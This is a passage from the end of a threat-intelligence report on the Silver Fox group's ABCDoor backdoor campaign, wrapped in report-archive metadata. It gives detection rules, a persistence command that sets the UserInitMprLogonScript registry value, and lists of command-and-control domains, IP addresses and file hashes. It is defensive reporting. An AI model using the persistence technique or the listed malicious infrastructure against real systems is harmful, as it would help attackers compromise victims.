undocumented ABCDoor\r\nbackdoor. 
The attackers are also expanding their geographic focus: Russian organizations became a primary target\r\nin this campaign, and Japan was added to the supported country list in the malware’s configuration. Theoretically,\r\nthe group could add other countries to this list in the future.\r\nThe Silver Fox group employs a multi-stage approach to payload delivery and utilizes a segmented infrastructure,\r\nusing different addresses and domains for various stages of the attack. These techniques are designed to minimize\r\nthe risk of detection and prevent the blocking of the entire attack chain. To identify such activity in a timely\r\nmanner, organizations should adopt a comprehensive approach to securing their infrastructure.\r\nDetection by Kaspersky solutions\r\nKaspersky security solutions successfully detect malicious activity associated with the attacks described in this\r\npost. Let’s look at several detection methods using Kaspersky Endpoint Detection and Response Expert.\r\nThe activity of the malware described in this article can be detected when the command interpreter, while\r\nexecuting commands from a suspicious process, initiates a covert request to external resources to download and\r\ninstall the Node.js interpreter. KEDR Expert detects this activity using the nodejs_dist_url_amsi rule.\r\nSilver Fox activity can also be detected by monitoring requests to external services to determine the host’s\r\nnetwork parameters. The attacker performs these actions to obtain the external IP address and analyze the\r\nenvironment. 
The KEDR Expert solution detects this activity using the\r\naccess_to_ip_detection_services_from_nonbrowsers rule.\r\nAfter running the command cmd /c start /min python/pythonw.exe -m appclient, the Silver Fox payload\r\nestablishes persistence on the system by modifying the value of the UserInitMprLogonScript parameter in the\r\nHKCU\\Environment registry key. This allows attackers to ensure that malicious scripts run when the user logs in.\r\nSuch registry manipulations can be detected. The KEDR Expert solution does this using the\r\npersistence_via_environment rule.\r\nIndicators of compromise\r\nNetwork indicators:\r\nABCDoor C2\r\n45.118.133[.]203:5000\r\nabc.fetish-friends[.]com\r\nabc.3mkorealtd[.]com\r\nabc.sudsmama[.]com\r\nabc.woopami[.]com\r\nabc.ilptour[.]com\r\nabc.petitechanson[.]com\r\nabc.doublemobile[.]com\r\nABCDoor loader C2s\r\nmcagov[.]cc\r\nroldco[.]com\r\nC2s for malicious remote control utilities\r\nvnc.kcii2[.]com\r\nDistribution servers for phishing PDFs, archives, and encrypted RustSL payloads\r\nabc.haijing88[.]com\r\nValleyRAT C2\r\n108.187.37[.]85\r\n108.187.42[.]63\r\n207.56.138[.]28\r\nIP addresses\r\n108.187.41[.]221\r\n154.82.81[.]192\r\n139.180.128[.]251\r\n192.229.115[.]229\r\n207.56.119[.]216\r\n192.163.167[.]14\r\n45.192.219[.]60\r\n192.238.205[.]47\r\n45.32.108[.]178\r\n57.133.212[.]106\r\n154.82.81[.]205\r\nHashes\r\nPhishing PDF files\r\n1AA72CD19E37570E14D898DFF3F2E380\r\n79CD56FC9ABF294B9BA8751E618EC642\r\n0B9B420E3EDD2ADE5EDC44F60CA745A2\r\n6611E902945E97A1B27F322A50566D48\r\n84E54C3602D8240ED905B07217C451CD\r\nSFX archives containing ABCDoor JavaScript loader\r\n2B92E125184469A0C3740ABCAA10350C\r\n043E457726F1BBB6046CB0C9869DBD7D\r\nZIP archives containing malicious SFX archives\r\n6495C409B59DEB72CFCB2B2DA983B3BB\r\nB500E0A8C87DFFE6F20C6E067B51AFBF\r\n90257AA1E7C9118055C09D4A978D4BEE\r\nF8371097121549FEB21E3BCC2EEEA522\r\n814032EEC3BC31643F8FAA4234D0E049\r\nrun.deobfuscated.obf.js\r\nB53E3CC11947E5645DFBB19934B69833\r\nrun_direct.ps1\r\n0C3B60FFC4EA9CCCE744BFA03B1A3556\r\nSilver Fox RustSL loaders\r\n039E93B98EF5E329F8666A424237AE73\r\nB6DF7C59756AB655CA752B8A1B20CFFA\r\n5390E8BF7131CAAAA98A5DD63E27B2BC\r\n44299A368000AE1EE9E9E584377B8757\r\nE5E8EF65B4D265BD5FB77FE165131C2F\r\n3279307508F3E5FB3A2420DEC645F583\r\n1020497BEF56F4181AEFB7A0A9873FB4\r\nB23D302B7F23453C98C11CA7B2E4616E\r\nA234850DFDFD7EE128F648F9750DD2C4\r\n4FC5EC1DE89CE3FCDD3E70DB4A9C39D1\r\nA0D1223CA4327AA5F7674BDA8779323F\r\n70AE9CA2A285DA9005A8ACB32DD31ACE\r\nDD0114FFACC6610B5A4A1CB0E79624CC\r\n891DE2FF486A1824F2DB01C1BDF1D2E9\r\nB0E06925DB5416DFC90BABF46402CD6F\r\nAD39A5790B79178D02AC739099B8E1F4\r\nD1D78CD1436991ADB9C005CC7C6B5B98\r\n2C5A1DD4CB53287FE0ED14E0B7B7B1B7\r\nE6362A81991323E198A463A8CE255533\r\nCB3D86E3EC2736EE1C883706FCA172F8\r\nA083C546DC66B0F2A5E0E2E68032F62C\r\n70016DDBCB8543BDB06E0F8C509EE980\r\n8FC911CA37F9F451A213B967F016F1F8\r\n202A5BCB87C34993318CFA3FA0C7ECB0\r\n06130DC648621E93ACB9EFB9FABB9651\r\nF7037CC9A5659D5A1F68E88582242375\r\n8AC5BEE89436B29F9817E434507FEF55\r\n5ED84B2099E220D645934E1FD552AE3A\r\n27A3C439308F5C4956D77E23E1AAD1A9\r\n53B68CA8D7A54C15700CF9500AE4A4E2\r\n1D1F71936DB05F67765F442FEB95F3FD\r\n3C6AEC25EBB2D51E1F16C2EEF181C82A\r\n7F27818E4244310A645984CCC41EA818\r\nA75713F0310E74FFD24D91E5731C4D31\r\n4FC8C78516A8C2130286429686E200ED\r\n3417B9CF7ACB22FAE9E24603D4DE1194\r\n933F1CB8ED2CED5D0DD2877C5EA374E8\r\nB5CA812843570DCF8E7F35CACAB36D4A\r\nValleyRAT plugins installing ABCDoor\r\n4A5195A38A458CDD2C1B5AB13AF3B393\r\nE66BAE6E8621DB2A835FA6721C3E5BBE\r\nABCDoor stagers and 
loaders\r\n04194F8DDD0518FD8005F0E87AE96335\r\nF15A67899CFE4DECFF76D4CD1677C254\r\n11705121F64FA36F1E9D7E59867B0724\r\nMalicious VNC installers used in August 2025 attacks\r\n4D343515F4C87B9A2FFD2F46665D2D57\r\nDFC64DD9D8F776CA5440C35FEF5D406E\r\nEEFC28E9F2C0C0592AF186BE8E3570D2\r\n6CF382D3A0EAE57B8BAAA263E4ED8D00\r\n32407207E9E9A0948D167DCA96C41D1A\r\nD17CAF6F5D6BA3393A3A865D1C43C3D2\r\nABCDoor .pyd files\r\n13669B8F2BD0AF53A3FE9AC0490499E5\r\n5B998A5BC5AD1C550564294034D4A62C\r\nC50C980D3F4B7ED970F083B0D37A6A6A\r\nDE8F0008B15F2404F721F76FAC34456A\r\n9BF9F635019494C4B70FB0A7C0FB53E4\r\nA543B96B0938DE798DD4F683DD92A94A\r\nFA08B243F12E31940B8B4B82D3498804\r\nSource: https://securelist.com/silver-fox-tax-notification-campaign/119575/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://securelist.com/silver-fox-tax-notification-campaign/119575/"
	],
	"report_names": [
		"119575"
	],
	"threat_actors": [],
	"ts_created_at": 1778121824,
	"ts_updated_at": 1778121850,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/40a740cc65981f960ecd5f2ee1450bf00b760d44.pdf",
		"text": "https://archive.orkl.eu/40a740cc65981f960ecd5f2ee1450bf00b760d44.txt",
		"img": "https://archive.orkl.eu/40a740cc65981f960ecd5f2ee1450bf00b760d44.jpg"
	}
}